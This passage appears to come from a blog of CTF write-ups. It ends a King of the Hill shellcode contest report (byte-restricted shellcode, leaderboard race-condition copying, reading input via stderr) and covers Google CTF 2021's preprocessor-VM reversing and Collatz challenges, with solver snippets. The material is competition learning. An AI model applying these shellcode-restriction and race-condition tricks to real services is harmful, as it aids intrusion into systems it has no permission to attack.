If 0x50 is banned, we could use 0x81 0xc3 (add ebx) and 0x53 (push ebx).
If 0xc3 is banned, we could use 0xc2, since ret 0 is the same as ret.
- If 0xc2 is banned, we could use 0xff 0xe0 (jmp eax).

For all of the above, we could replace the register rax with any other register and the method should still work. The same analysis applies to a four-byte set as well.

Phishing Strategy

It all sounds like fun and games, until you remember that the rules said any shellcode that doesn’t use one of the bytes the current top-of-the-hill shellcode had could be accepted. So was everything we’d been doing in vain!?

Well, if we could ban every single byte except for these three bytes, then obviously we could take the top of the hill and win without a doubt. However, we couldn’t submit again while we were at the top of the hill, so it was nearly impossible to ban the bytes we wanted to ban. Or was it?

The first idea that came to mind was to collude with some other team. If another team could submit a shellcode that uses all the bytes, then our three-byte shellcode would wipe every other byte out. However, let alone the rules this would potentially break, it’s clear that no team would collaborate with us on this.

Then a thought crossed my mind: it is totally possible for us to ban all the other bytes without anyone’s cooperation. The other teams would be helping us whether they wanted to or not. It’s time for phishing!

The idea was dead simple:

We prepare a few shellcodes that each use as few distinct bytes as possible. The shellcodes CANNOT contain the three bytes we need to use. The bytes used in these shellcodes should overlap each other as little as possible.
At each round, we check the current banned bytes, and pick a shellcode that does not contain any of them. Then, we append all other bytes to the end of the shellcode, but don’t include the banned ones. For the three bytes we need, there are two cases:
- If the current top-of-the-hill shellcode includes that byte, then also append that byte to the end,
- Otherwise, don’t include that byte in our submitted shellcode.
Once we have submitted that shellcode, we just have to wait for another team to submit whatever shellcode they have, and then submit our three-byte shellcode. Then, all the other bytes should be banned except for the three bytes we use.
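The padding step above can be sketched as follows. Everything here is illustrative: build_bait, OUR_BYTES and the argument names are made-up names, and the base shellcodes are assumed to be given as bytes objects that still work with junk appended after them.

```python
OUR_BYTES = frozenset({0x05, 0x50, 0xC3})   # the three bytes we want to keep unbanned

def build_bait(bases, banned, top_bytes):
    """Pick a base shellcode that avoids the banned bytes and pad it with
    every other byte we want the next round to ban."""
    banned, top_bytes = set(banned), set(top_bytes)
    base = next((b for b in bases if not set(b) & banned), None)
    if base is None:
        return None                      # no prepared shellcode survives the bans
    padding = bytes(
        x for x in range(256)
        if x not in banned               # banned bytes would get us rejected
        and x not in base                # already present in the base
        and (x not in OUR_BYTES or x in top_bytes)   # our bytes only if the top has them
    )
    return base + padding
```

A submission built this way contains every byte that is still allowed, apart from those of our three bytes that the current top-of-the-hill does not use.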

Of course, if one of our three bytes was already banned, then this couldn’t work. But overall this seemed like a really good strategy. It’s almost like phishing because it would result in other teams submitting shellcode that is actually used against them, while they had no idea what happened.

As for how it really went in the real game, I’ll leave that to a later part.

Copying Homework

Recall the race condition we talked about earlier. Another group of our KoH players were thinking about how to exploit it. The game also features an in-game leaderboard, where everyone can see each other’s accepted shellcode. We then had a great idea of how to utilize this race condition and the leaderboard:

Start two threads that connect to the game service simultaneously, so they have the same view of the history.
Thread 1 keeps its connection alive, while thread 2 constantly reconnects to check if there’s a change in the leaderboard.
If thread 2 detects a new top-of-the-hill shellcode, it sends that shellcode to thread 1.
Thread 1 then waits until seconds before the connection times out (30 seconds), and submits that shellcode.

A diagram looks like this:

This would work because Thread 1 had an old view of history, so if team B’s shellcode could be accepted for that version of history, then definitely we could use the same shellcode as well. This would also wipe Team A’s submission out of existence. A really powerful strategy indeed.

Countermeasure

The way to counter this (of course there is one) is for the submitting team to do exactly the same thing.

Although we didn’t quite think of this during the preparation, for the sake of consistency, I’ll put it here.

When submitting a new shellcode, the team has to open two connections: one submits the shellcode immediately, and the other waits until just before the timeout to submit. This works because:

Suppose another team A who’s trying to steal the shellcode opens a connection at $t_0$. So for that team, the shellcode it can steal is submitted in the time range $(t_0, t_0+t_{\text{close}}]$ where $t_{\text{close}}$ is the connection timeout. Suppose we submit our shellcode at $t_1$, where $t_1 \in (t_0, t_0+t_\text{close}]$, then the best they can do is to resubmit the shellcode at time $t_0+t_\text{close}$. However, we then resubmit our shellcode at $t_1+t_\text{close}$, so our record will still be on the leaderboard. Notice that no matter how close $t_0$ and $t_1$ can be, since $t_0 < t_1$ because the stealing team must read history before our submission, it must be $t_0+t_\text{close}< t_1+t_\text{close}$.

Therefore as long as we submitted our shellcode twice using the strategy, we could make sure that our shellcode wouldn’t be stolen.

Some Other Methods

A Repository of Shellcodes

We also put all of the possible shellcodes into a git repository, and we wrote a script to pick the shellcodes from the repository to submit with some rules and heuristics:

First we cross out the shellcodes that couldn’t possibly be accepted, either because of banned bytes or because they weren’t better than the current top-of-the-hill.
Then, among the remaining shellcodes, we pick the one that, if accepted, would ban the largest number of bytes.
In case of a draw, we submit the shellcode that’s shortest in length.
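A rough sketch of that selection rule, under two assumptions that the text does not spell out: "better" is taken to mean strictly shorter than the current top-of-the-hill, and the number of bytes a shellcode would ban is taken to be its number of distinct bytes. The name pick_shellcode is hypothetical.

```python
def pick_shellcode(repo, banned, top_length):
    """repo is a list of bytes objects; returns the one to submit, or None."""
    banned = set(banned)
    # Step 1: drop anything that uses a banned byte or is not shorter than the top.
    viable = [s for s in repo if not set(s) & banned and len(s) < top_length]
    if not viable:
        return None
    # Step 2 and 3: most distinct bytes first, shortest length as the tie-breaker.
    return max(viable, key=lambda s: (len(set(s)), -len(s)))
```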

Any shellcode we encounter during the game would also be added into this repository.

Fuzzing

Remember the fuzzing we talked about in zero-is-you? Now it’s back. I didn’t work on this so I don’t know much about the details, but essentially it would take the current top-of-the-hill and try to fuzz out a shellcode that is shorter than the current one.

Using Existing Tools

There were clearly CTFs before that required inputting shellcode using only printable characters, so definitely there were existing tools to generate/transform shellcodes into limited character set. We found some of the tools and they really worked pretty well.

Game Start

The game started, and the phishing strategy worked right away: we blocked all the bytes, just to see the history rewritten by some other teams. At that time we hadn’t figured out the countermeasure yet, so that’s that. Nonetheless, copying homework did work and we were on the top of the hill for a moment.

We didn’t plan to use the 3-byte strategy until we had a reasonably large set of banned bytes. However, one thing we missed is that we had put our 3-byte shellcode into the repository as well, so the script automatically submitted it. Oh well, that’s bad. Not only was our trump card leaked so that everyone could figure out how it worked, but we also submitted it when there were still a lot of acceptable bytes, so anyone could take us down with an easy shellcode.

Furthermore, it’s obvious that we were the only ones who figured out how to use only a 3-byte set (not exactly, more on that later) to construct a shellcode, but everyone noticed the race condition and started to copy each other’s homework. It’s really sad to see that we submitted a shellcode, and just a few seconds later we disappeared from the leaderboard and were replaced by some other team with the same shellcode.

That being said, the game was fair to everyone, and we did successfully copy others’ homework as well, so no real complaints here.

Unexpected Reset

We were the winner for the first round, everything was going smoothly, until it wasn’t.

At the start of the second round, it all seemed normal as teams were submitting different shellcodes again, but then, out of nowhere, a reset happened. It was not a reset as if someone had become a winner again; it was a reset as if the entire history had been wiped out. We could tell because we were no longer under the Renowned ancestors section. We thought maybe it was a sync issue, that there were some problems with the sync script that messed everything up. But the weirdest thing was yet to come.

StarBugs’s true 3-byte shellcode blew our minds. 69 89 73 was immediately the meme in the Discord server. There was no way, we thought, that a shellcode this short would do the things the game asked us to do. We were certain that either the syncing script had messed something up, or it had cut off a part of the shellcode.

However, OOO said that “the sync bot [was] working just fine,” so it made me think of another possibility: they must have had some Linux kernel chroot escape zero-day, or else how would you explain the situation?

Anyway, 698973 didn’t stay on the top for long, because there were still plenty of acceptable bytes to use, so other teams were able to use the remaining bytes to write something and kick StarBugs out. It might have been a fluke then, we thought, so we quickly went back to the battlefield.

Read From Stderr

It was all going pretty normally for a few rounds, but then something weird happened again. This time, PPP threw out 000000ca00080091210000d4, and we were all like, what? Soon enough, 698973 came back, and 699973 appeared. We were all dumbstruck. A quick run of the code in our local environment showed clearly that these shellcodes didn’t pass the test, so what trickery were they playing?

Before long, my teammate noticed something odd. If you ran these shellcodes, the execution would actually take longer for some reason. It would get stuck at one architecture and then time out after 5 seconds. That’s a bit weird. Then, we noticed that if you were to press Enter, the shellcode would exit immediately. This was a sign of accepting input!

The questions then were: what was the input format, and why could you input anything at all? The second one isn’t hard to figure out, as we finally saw that in the subprocess execution, the stderr was redirected as 1, but you could actually read data from it. This is really wild but not something we hadn’t seen before.

While some were investigating how the shellcode itself worked, we took an educated guess that it just accepted raw shellcode. So quickly we wrote a shellcode using that architecture, input it when the shellcode waited for input, and it really did work.

After that and some digging into the RISC-V and ARM64 architecture specifications, we figured out how the shellcode could read from input while having only 3 bytes.

I wasn’t focused on this so I didn’t know how it actually worked. The reader can refer to some other fantastic write-ups.

Phishing Worked

An hour or so before the game ended, the phishing finally worked and the accepted bytes were limited to only 3 bytes. We were so happy, just to find out that someone had copied our homework.

That was really bad news because we had been too naïve and had already submitted our optimal solution. It ended up that we had to look for another ROP chain that would result in a shorter shellcode after converting it into an ADD/PUSH ROP chain.

After a few minutes, we found one, and we were really excited, so someone just submitted the shellcode by hand. And you know what happened? Our homework was copied once again. Oh big F.

Finally we found another one, and this time we had learned our lesson. We finally figured out the countermeasure (mentioned above), and submitted it the right way. We then started our 15-minute countdown, while preparing the next three-byte payload.

However, an unexpected reset happened once again before we reached 15 minutes, and we didn’t even have enough time to start running our phishing script. Welp, that’s the end for phishing I guess.

To the End

It was then basically a battle of shellcodes that read from stderr. Since we had figured out how it worked, we used this technique as well. At the end, PPP threw out the final bomb, shellcode 73 00, probably the shortest shellcode that could be accepted.

We still haven’t figured out why the unexpected resets happened. Was it some other team doing things to alter history, or just a bad sync script made by OOO? Probably we could figure it out by digging into the pcaps, but I’ll leave that to the reader.

Epilogue

Writing this took way longer than I planned, but I’m glad I had most of the details laid out, as a memorial to this precious experience. I genuinely had a lot of fun playing with Tea Deliverers, hope they will still bring me in next year.

Finally, here’s an overall ranking for KoH:

Thank you for reading!

Google CTF 2021

2021-07-19T07:40:00-04:00

This weekend I was planning to play The Great Ace Attorney: Adventures with my SO.

Yet here I am, and she was pretty angry about that.

CPP

So CPP stands for C Pre-Processor, clearly seen from the compiler’s warning message -Wcpp.

Eyeballing the Code

Opening the file, we see a bunch of pre-processing macros. In fact, most of the code is macros, and if we scroll to the bottom we can see a tiny bit of actual C code that will compile if the pre-processing passes without errors.

It is pretty obvious that we need to somehow figure out the running process of the pre-processor, and the flag we are looking for is hidden within.

Going back to the top of the file (line 16), we first see a list of definitions of flag characters from FLAG_0 to FLAG_26, 27 characters in total. It’s then followed by a list of definitions of the characters used in the flag string (line 45), which includes all 26 English letters, in both lowercase and uppercase, and 10 numeral digits, plus underscore _ and brackets { and }, all defined to be their ASCII values. In total, 65 characters can possibly be used in the flag string. The number of possible flags is $65^{27}$, which is clearly impossible to brute-force.

The next section is a list of definitions (line 111), including a variable S and a bunch of variables starting with ROM_. Without any further context, we can assume that this is the part where the memory is defined for this program, where ROM_xxxxxxxx_y means the yth bit of the address 0bxxxxxxxx. The pre-defined memory values lie within the range of 0b00000000 - 0b01111111 (0x0 - 0x7F), and the flag string is stored in 0b10000000 - 0b10011010 (0x80 - 0x9A).

It is also from this part (line 840) we can tell that our assumption above is correct. Furthermore, we can see that the 0th bit of each address in ROM is the least-significant bit, and the 7th is the most-significant one. A code snippet like this

#if FLAG_0 & (1<<2)
#define ROM_10000000_2 1
#else
#define ROM_10000000_2 0
#endif

checks bit 2 of FLAG_0 (counting from 0) and stores the value into ROM_10000000_2.

The next five lines (line 1920-1924) define some function-like macros. We can see that LD(x, y) is the same as ROM_x_y, meaning that LD loads the yth bit from address x in ROM. The function MA(l0, l1, l2, l3, l4, l5, l6, l7) concatenates bits l0 to l7 together, but in reverse order, meaning MA(1, 1, 1, 1, 0, 0, 0, 1) will give the string 10001111. Here, we can’t be sure yet that l0 to l7 are only 0 or 1, but it will become apparent in the following analysis. The final macro l is simply a shorthand for the above MA function called on l0 to l7.
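As a small model of how these macros fit together, the following sketch mimics LD and MA with a dictionary standing in for the ROM_ macros. The helper names (ma, ld, store_byte, load_byte) are made up for illustration and are not part of the challenge file.

```python
def ma(*bits):
    """Like MA(l0, ..., l7): paste the bits together, most significant (l7) first."""
    return "".join(str(b) for b in reversed(bits))

def ld(rom, addr, bit):
    """Like LD(x, y): look up the macro ROM_x_y."""
    return rom[f"ROM_{addr}_{bit}"]

def store_byte(rom, address, value):
    """Define ROM_<address>_0 .. ROM_<address>_7, bit 0 being the least significant."""
    for bit in range(8):
        rom[f"ROM_{address:08b}_{bit}"] = (value >> bit) & 1

def load_byte(rom, address_bits):
    """Rebuild a whole byte from eight single-bit loads."""
    addr = ma(*address_bits)
    return sum(ld(rom, addr, bit) << bit for bit in range(8))
```

For example, after store_byte(rom, 0x80, ord('C')) the entry ROM_10000000_2 holds 0, and load_byte(rom, [0, 0, 0, 0, 0, 0, 0, 1]) gives back ord('C').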

Code Formatting

The next part, starting from line 1926, is very messy: there are a lot of #if... directives without proper indentation, which makes it really hard to read. We wrote a simple formatter:

with open('cpp.c', 'r') as in_file, \
     open('cpp.formatted.c', 'w') as out_file:
    indent = ''
    for line in in_file:
        if line.startswith('#if'):
            print(indent + line, end='', file=out_file)
            indent += '  '
        elif line.startswith('#else'):
            print(indent[:-2] + line, end='', file=out_file)
        else:
            if line.startswith('#endif'):
                indent = indent[:-2]
            print(indent + line, end='', file=out_file)

The end result looks like this

#if S == 3
  #undef S
  #define S 4
  #undef c
  #ifndef R0
    #ifndef Z0
      #ifdef c
        #define R0
        #undef c
      #endif
    #else
      #ifndef c
        #define R0
[...]

Which is much more intelligible.

Structure Overview

The part above looks like the main program, so we’ll skip it for now. Jumping all the way to the bottom (line 6217), we see that the code includes itself twice if S != -1. We also see that the pre-defined macro __INCLUDE_LEVEL__ is used. It is a macro that starts at 0 and increases by 1 for each level of nested #include. This means the code expands differently at different include levels.

Overall structure of the file can be seen as:

if (__INCLUDE_LEVEL__ == 0) {
  flag_str := "CTF{write_flag_here_please}"

  /* define character ascii value */
  
  MEMORY[0x0 - 0x7F] := {...}
  
  copy(&MEMORY[0x80], flag_str)
}

if (__INCLUDE_LEVEL__ > 12) {
  // main program
} else {
  if (S != -1) {
    #include self
  }
  if (S != -1) {
    #include self
  }
}

Reversing the Program

For the main program (line 1927 - 6215), we can see a pattern that looks like this:

#if S == [x]
  #undef S
  #define S [x+1]
  [...]
#endif
#if S == [x+1]
  #undef S
  #define S [x+2]
[...]

where x ranges from 0 to 58. Experience tells us that S should be the instruction pointer, and by default it moves on to the next instruction. However, the preprocessor only goes in one direction, so how does this program jmp? Or in other words, what happens if the program does #define S [x] where x is less than the current S value?

This is where those two #includes come into play. The code includes itself twice when __INCLUDE_LEVEL__ is at most 12 and S != -1. From there we know two things:

The program ends when S, the instruction pointer, == -1
The program jumps by setting S. If the new S is less than the current S, the corresponding instruction is executed in the next #include pass over the same code.
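To see why the double self-include acts like a loop, here is a small model of the mechanism. It is only a sketch: run_pass, include and the four-instruction toy program are hypothetical, and each instruction is modelled as a Python function instead of a block of directives. With the level check from the structure overview, the main program can be scanned at most 2^13 = 8192 times.

```python
def run_pass(program, state):
    """One top-to-bottom scan of the main program: instruction x only fires
    if S == x at the moment the scan reaches it."""
    state["passes"] += 1
    for x, op in enumerate(program):
        if state["S"] == x:
            state["S"] = x + 1          # default: fall through to the next one
            op(state)                   # the body may overwrite S (a jump)

def include(program, state, level=0, max_level=12):
    if level > max_level:
        run_pass(program, state)        # deepest level: the main program itself
        return
    for _ in range(2):                  # the two self-includes
        if state["S"] != -1:
            include(program, state, level + 1, max_level)

# Toy program: count n down from 3 using a backward jump.
def op_init(st): st["n"] = 3
def op_dec(st): st["n"] -= 1
def op_loop(st):
    if st["n"] != 0:
        st["S"] = 1                     # backward jump, picked up by the next pass
def op_exit(st): st["S"] = -1

state = {"S": 0, "passes": 0}
include([op_init, op_dec, op_loop, op_exit], state)
```

A forward jump is handled within the same scan, while a backward jump simply waits for the next scan, which is why every trip around a loop costs one pass.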

Since S’s initial value is 0, we followed the execution path and tried to manually figure out what each instruction means:

S == 0: A single #define S 24 means JMP 24.
S == 24: What’s going on? Why there’s a lot of #undef?

S == 30

Ignoring the confusion, I followed the path all the way to S == 30 and saw a humongous body for this single instruction.

I originally thought this was somehow a form of obfuscation, so I wrote a static analyzer for this program and see if I can rip away some of the things. Spent a lot of time on this, later realizing it was heading towards a wrong direction.

We see something that looks like this:

#ifndef Bx
  #ifndef Ix
    #ifdef c
      #define Bx
      #undef c
    #endif
  #else
    #ifndef c
      #define Bx
      #undef c
    #endif
  #endif
#else
  #ifndef Ix
    #ifdef c
      #undef Bx
      #define c
    #endif
  #else
    #ifndef c
      #undef Bx
      #define c
    #endif
  #endif
#endif

for x ranging 0 to 7. Let’s make it clearer by constructing a table:

Bx	Ix	c	Bx_after	c_after
N	N	N	N	N
N	N	Y	Y	N
N	Y	N	Y	N
N	Y	Y	N	Y
Y	N	N	Y	N
Y	N	Y	N	Y
Y	Y	N	N	Y
Y	Y	Y	Y	Y

Where N means that the macro is undefined and Y means it is defined. Bx_after and c_after are the states of Bx and c after running this instruction. Only four rows actually change anything: (N, N, Y), (N, Y, N), (Y, N, Y) and (Y, Y, N). Every other combination of Bx, Ix and c matches none of the branches, so the values stay as they were.

It is then clear that this is B += I in binary, where c is the carry bit. The only part that is confusing is actually how a bit is represented.
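As a quick sanity check of that reading, the ladder can be modelled per bit and compared with a full adder. This is a sketch with made-up names (add_bit, add8), and it assumes the carry c is undefined when the instruction starts.

```python
def add_bit(b, i, c):
    """One rung of the ladder for bit x; True means the macro is defined."""
    if (i and not c) or (c and not i):   # the only branches that change anything
        if not b:
            b, c = True, False           # #define Bx, #undef c
        else:
            b, c = False, True           # #undef Bx, #define c
    return b, c

def add8(b, i):
    """Apply the rung to bits 0..7 in order, rippling the carry through."""
    c = False                            # assumption: carry is clear on entry
    out = 0
    for x in range(8):
        bit, c = add_bit(bool(b >> x & 1), bool(i >> x & 1), c)
        out |= bit << x
    return out
```

Every one of the eight input combinations of add_bit agrees with a full adder, and add8 behaves like 8-bit addition with wrap-around, for instance add8(229, 27) gives 0.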

#define and #undef a Bit

When we first analyzed this code, all values were set using #define [variable] [value]. This applies to the flag value, the MEM section and S, the instruction pointer. However, things change a bit in the main program. Here, a bit is set or unset using #define and #undef, and checked using #ifdef and #ifndef respectively: the existence of the macro decides whether the bit is 1 or 0. So, for a code snippet like this:

#define B0
#undef  B1
#define B2
#undef  B3
#undef  B4
#define B5
#define B6
#define B7

If we consider B as a signed 8-bit number, then it is equivalent of setting B = 0b11100101 (-27).
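The conversion from "which Bx macros are defined" to a signed value can be written out as a tiny sketch. The function name byte_from_defined is hypothetical.

```python
def byte_from_defined(defined):
    """defined is the set of bit indices x for which Bx is #defined."""
    unsigned = sum(1 << x for x in defined)
    # Interpret the 8-bit pattern as two's complement.
    return unsigned - 256 if unsigned & 0x80 else unsigned
```

For the snippet above, B0, B2, B5, B6 and B7 are defined, so byte_from_defined({0, 2, 5, 6, 7}) is 229 - 256 = -27.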

With this knowledge, we can finally start our reversing process.

Continue where we left off:

24: I = 0
25: M = 0
26: N = 1
27: P = 0
28: Q = 0
29: B = -27
30: B += I as we just analyzed.

S == 31

#ifndef B0
  #ifndef B1
    #ifndef B2
      #ifndef B3
        #ifndef B4
          #ifndef B5
            #ifndef B6
              #ifndef B7
                #undef S
                #define S 56
              #endif
            #endif
          #endif
        #endif
      #endif
    #endif
  #endif
#endif

By our analysis above, this means that if B == 0, we will jump to instruction 56.

Therefore, instruction 31 is IF B == 0 THEN JMP 56.

32: B = 0x80
33: B += I, same as instruction 30

S == 34

There are two parts in this instruction, let’s check them out one by one:

#undef lx
#ifdef Bx
  #define lx 1
#else
  #define lx 0
#endif

for x ranging from 0 to 7. It is easy to recognize that this checks each bit of B and sets lx to the literal value 1 or 0.

The next part looks like this:

#if LD(l, x)
  #define Ax
#else
  #undef Ax
#endif

for x ranging 0 to 7. As we have analyzed before, LD(l, x) is the function to load MEM portion using address in l and the xth bit. The #if is to convert literal 0 and 1 in memory back to the bit representation (defined or undefined) in the program.

Taking the above together, we see that this is a memory load operation, which takes B as a memory address and stores the loaded value in A. Therefore, instruction 34 is A = LOAD(B).

35: B = LOAD(I), similar to instruction 34.
36: R = 1
37: JMP 12

12: X = 1
13: Y = 0
14: IF X == 0 THEN JMP 22, similar to instruction 31.

S == 15

#ifdef Xx
  #define Zx
#else
  #undef Zx
#endif

for x ranging from 0 to 7. It is easy to recognize that this copies each bit of X to Z, so this is an assignment. Instruction 15 is Z = X.

S == 16

#ifdef Zx
  #ifndef Bx
    #undef Zx
  #endif
#endif

for x ranging 0 to 7. From the syntax of it, we can see that Zx will be 0 when Bx is 0.

You can draw out a table for this, but I’ll cut to the chase…

Which means that this instruction is a bitwise-and operation, Z = Z & B.

17: IF Z == 0 THEN JMP 19
18: Y += A
19: X += X
20: A += A
21: JMP 14

22: A = Y
23: JMP 1

S == 1

#ifdef Rx
  #undef Rx
#else
  #define Rx
#endif

Should be pretty obvious that this is a bitwise-not, R = ~R.

2: Z = 1
3: R += Z
4: R += Z
5: IF R == 0 THEN JMP 38
6: R += Z
7: IF R == 0 THEN JMP 59
8: R += Z
9: IF R == 0 THEN JMP 59
10: #ERROR BUG
11: EXIT, as we talked about S == -1 means ending the program.

38: O = M
39: O += N
40: M = N
41: N = O
42: A += M
43: B = 0x20
44: B += I
45: C = LOAD(B)

S == 46

#ifdef Cx
  #ifdef Ax
    #undef Ax
  #else
    #define Ax
  #endif
#endif

Let’s draw a table for this:

Cx	Ax	Ax after
0	0	0
0	1	1
1	0	1
1	1	0

In the remaining cases, when Cx is not set, Ax is left unchanged. So we can say that

\[A_x = \begin{cases} A_x & \text{if}\ C_x=0 \\ \neg A_x & \text{if}\ C_x=1 \\ \end{cases} \implies A_x = A_x \oplus C_x\]

Meaning instruction 46 is exclusive-or operation, A ^= C.

47: P += A
48: B = 0x40
49: B += I
50: A = LOAD(B)
51: A ^= P, similar to instruction 46

S == 52

#ifndef Qx
  #ifdef Ax
    #define Qx
  #endif
#endif

Very similar to instruction 16, but this time we can see Qx will be 1 when Ax is 1, and otherwise unaffected.

Again you can draw out a table for this.

Which means that this instruction is a bitwise-or operation, Q = Q | A.
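The three bit-twiddling instructions (16, 46 and 52) can be checked the same way by treating a register as the set of bit indices whose macro is defined. The sketch below uses hypothetical helper names and simply mirrors each #ifdef block.

```python
def bits(v):
    """Set of indices x whose macro would be defined for the value v."""
    return {x for x in range(8) if v >> x & 1}

def value(defined):
    return sum(1 << x for x in defined)

def op16(Z, B):
    """#ifdef Zx / #ifndef Bx / #undef Zx: Zx survives only if Bx is defined."""
    return {x for x in Z if x in B}

def op46(A, C):
    """#ifdef Cx: toggle Ax."""
    A = set(A)
    for x in C:
        if x in A:
            A.remove(x)
        else:
            A.add(x)
    return A

def op52(Q, A):
    """#ifndef Qx / #ifdef Ax / #define Qx."""
    return set(Q) | {x for x in A if x not in Q}
```

Comparing value(op16(bits(a), bits(b))) with a & b, and likewise op46 with ^ and op52 with |, gives the same result for every pair of bytes.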

53: A = 1
54: I += A
55: JMP 29

56: IF Q == 0 THEN JMP 58
57: #ERROR "INVALID FLAG"
58: EXIT

Rewrite the Program

Since we now have analyzed every single instruction of the program, let’s write a pseudo program for this:

I = 0                   // 24
M = 0                   // 25
N = 1                   // 26
P = 0                   // 27
Q = 0                   // 28

for {
  B = -27               // 29
  B = B + I             // 30
  if (B == 0) break;    // 31
  B = 0x80              // 32
  B = B + I             // 33
  A = LOAD(B)           // 34
  B = LOAD(I)           // 35
  R = 1                 // 36

  X = 1                 // 12
  Y = 0                 // 13
  for X != 0 {          // 14
    Z = X               // 15
    Z = Z & B           // 16
    if (Z != 0) {       // 17
      Y += A            // 18
    }
    X += X              // 19
    A += A              // 20
  }                     // 21
  A = Y                 // 22
  
  R = ~R                // 1
  Z = 1                 // 2
  R += Z                // 3
  R += Z                // 4
  if (R != 0) abort()   // 5 - 11 (won't reach here)
  
  O = M                 // 38
  O += N                // 39
  M = N                 // 40
  N = O                 // 41
  A += M                // 42
  B = 0x20              // 43
  B += I                // 44
  C = LOAD(B)           // 45
  A ^= C                // 46
  P += A                // 47

  B = 0x40              // 48
  B += I                // 49
  A = LOAD(B)           // 50
  A ^= P                // 51
  Q |= A                // 52
  A = 1                 // 53
  I += A                // 54
}

if (Q != 0) {           // 56
    "INVALID FLAG"      // 57
}

EXIT                    // 58

After some tidying up and rewriting it in Go, we get

var M uint8 = 0
var N uint8 = 1
var P uint8 = 0
var Q uint8 = 0

for I := uint8(0); I < 27; I++ {
    A := MEMORY(0x80 + I)
    B := MEMORY(I)

    var X uint8 = 1
    var Y uint8 = 0
    for X != 0 {
        if X&B != 0 {
            Y += A
        }
        X += X
        A += A
    }
    A = Y

    O := M + N
    M = N
    N = O

    A += M
    A ^= MEMORY(0x20 + I)
    P += A

    Q |= MEMORY(0x40+I) ^ P
}

if Q != 0 {
    fmt.Println("invalid flag")
}

Notice that R is gone. Since ~1 + 2 == 0 is for sure, we can optimize it out. Some of the intermediate variables are also optimized out.
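Two small observations about this simplification can be checked with a sketch. The first is the R dispatch: in 8-bit arithmetic, ~1 + 2 wraps around to 0. The second is not stated above but follows from the loop itself: the inner X/Y loop is a shift-and-add multiplication, so after it A holds A * B modulo 256. The function names are made up for illustration.

```python
def dispatch_r(r):
    """R = ~R, then R += 1 twice (instructions 1 to 4), all in 8 bits."""
    return ((~r & 0xFF) + 2) & 0xFF

def inner_loop(a, b):
    """Instructions 12 to 22: X walks over the powers of two until it overflows to 0."""
    x, y = 1, 0
    while x != 0:
        if x & b:
            y = (y + a) & 0xFF
        x = (x + x) & 0xFF
        a = (a + a) & 0xFF
    return y
```

So with R = 1 the check at instruction 5 always jumps to 38, and the first half of each iteration simply multiplies the flag byte by the value stored at MEMORY(I).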

Get the Flag

It is possible to figure out the logic behind the memory operations and try to extract the flag by reversing the process. However, with some observation, we see that the flag is identified as invalid when Q != 0 at the end of the program. Looking at the entire program, Q is only ever updated in one place, Q |= [some value]. By the property of bitwise-or, any bit that is set stays set. Therefore, for Q == 0 to hold at the end, Q must stay at zero in every iteration of the loop.

Also, the program processes flag string one byte by one byte, which means that, if at any iteration of the loop, Q is some value not 0, then that byte must be a faulty byte.

Using this knowledge, we are able to reduce the search space from $65^{27}$ to $65 \times 27$. The exploit then is to test out the string character one-by-one, and continue if Q is kept 0 during the loop.
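The character-by-character search can be sketched as below. This is not the linked exploit: since the real ROM contents are not reproduced here, the sketch builds a toy memory from a made-up secret (make_toy_mem, with arbitrary odd multipliers) and then recovers it. Unlike the original, the candidate flag is passed as a string instead of being stored at 0x80, and the inner multiplication loop is written directly as a product modulo 256.

```python
import string

ALPHABET = string.ascii_letters + string.digits + "_{}"   # the 65 candidates

def step(mem, i, ch, M, N, P):
    """One loop iteration of the checker for flag byte i; returns new (M, N, P)."""
    A = (ord(ch) * mem[i]) & 0xFF
    M, N = N, (M + N) & 0xFF
    A = ((A + M) & 0xFF) ^ mem[0x20 + i]
    return M, N, (P + A) & 0xFF

def passes(mem, flag):
    """True if Q stays 0 for every byte of this (possibly partial) flag."""
    M, N, P = 0, 1, 0
    for i, ch in enumerate(flag):
        M, N, P = step(mem, i, ch, M, N, P)
        if mem[0x40 + i] ^ P:
            return False
    return True

def make_toy_mem(secret):
    """Hypothetical ROM for which `secret` is the only accepted flag."""
    mem = [0] * 256
    M, N, P = 0, 1, 0
    for i, ch in enumerate(secret):
        mem[i] = (2 * i + 3) & 0xFF          # odd, so no two characters collide
        mem[0x20 + i] = (7 * i + 1) & 0xFF
        M, N, P = step(mem, i, ch, M, N, P)
        mem[0x40 + i] = P
    return mem

def recover(mem, length):
    flag = ""
    for _ in range(length):
        # At most 65 tries per position instead of 65**27 overall.
        flag += next(ch for ch in ALPHABET if passes(mem, flag + ch))
    return flag
```

Calling recover(make_toy_mem("CTF{toy_flag}"), 13) returns the toy secret after at most 65 checks per position.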

The exploit can be found here: CPP, Google CTF 2021.

ICAN’TBELIEVEIT’SNOTCRYPTO

This is a pretty simple challenge, once you know what is going on.

So the question asks to give two lists l1 and l2, where l1 contains only 0 and 1, and l2 only contains 0, 1, and 2. The lists go through the function step() each time, and count() counts how many steps it will take for l1 and l2 to reach the state where l1 = [1] and l2 = [0]. The flag will be printed if it needs more than 2000 steps.

There are two constraints, namely that len(l1) == len(l2) and len(l1) < 24. So you can’t give a sufficiently large array to pass the test.

I spent a LOT of time on this and didn’t find the solution, only to find out that this is a well-known and well-studied problem in disguise. It is actually the process described in the Collatz conjecture. l1 and l2 are just a number converted to its base-6 form, with each digit split across the two lists. A simple conversion script looks like this:

def to_lists(num):
    l1 = []
    l2 = []
    while num:
        digit = num % 6
        l1.append(digit & 1)
        l2.append(digit >> 1)
        num //= 6
    return l1, l2

def from_lists(l1, l2):
    num, mul = 0, 1
    for i in range(len(l1)):
        digit = l1[i] | (l2[i] << 1)
        num += digit * mul
        mul *= 6
    return num

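Starting values with the largest total stopping time below various bounds are listed on the Wikipedia page. Since both lists have fewer than 24 entries, our number must be below $6^{23} \approx 7.9 \times 10^{17}$, and the relevant entry is: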

less than 10¹⁷ is 93571393692802302, which has 2091 steps […]

which is enough for the required 2000 steps. Therefore the exploit is simply something like this:

char = ord('f')
assert(char % 6 == 0)
l1, l2 = to_lists(93571393692802302)
str1, str2 = "", ""
for i in l1:
    str1 += chr(char + i)
for i in l2:
    str2 += chr(char + i)
print(str1)
print(str2)

Which gives us output string fggffgfgfggffffgffgggf and fgghfgghhhhhhghffgggfh. Input it and we get the flag.
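As a cross-check of the numbers involved, the following sketch counts plain Collatz steps and base-6 digits. It assumes that the challenge’s count() agrees with the usual total stopping time, which the text above implies but this sketch does not verify against the challenge code. The function names are made up.

```python
def total_stopping_time(n):
    """Number of Collatz steps (n/2 or 3n+1) needed to reach 1."""
    steps = 0
    while n != 1:
        n = n // 2 if n % 2 == 0 else 3 * n + 1
        steps += 1
    return steps

def base6_length(n):
    """How many base-6 digits n has, i.e. the length of l1 and l2."""
    length = 0
    while n:
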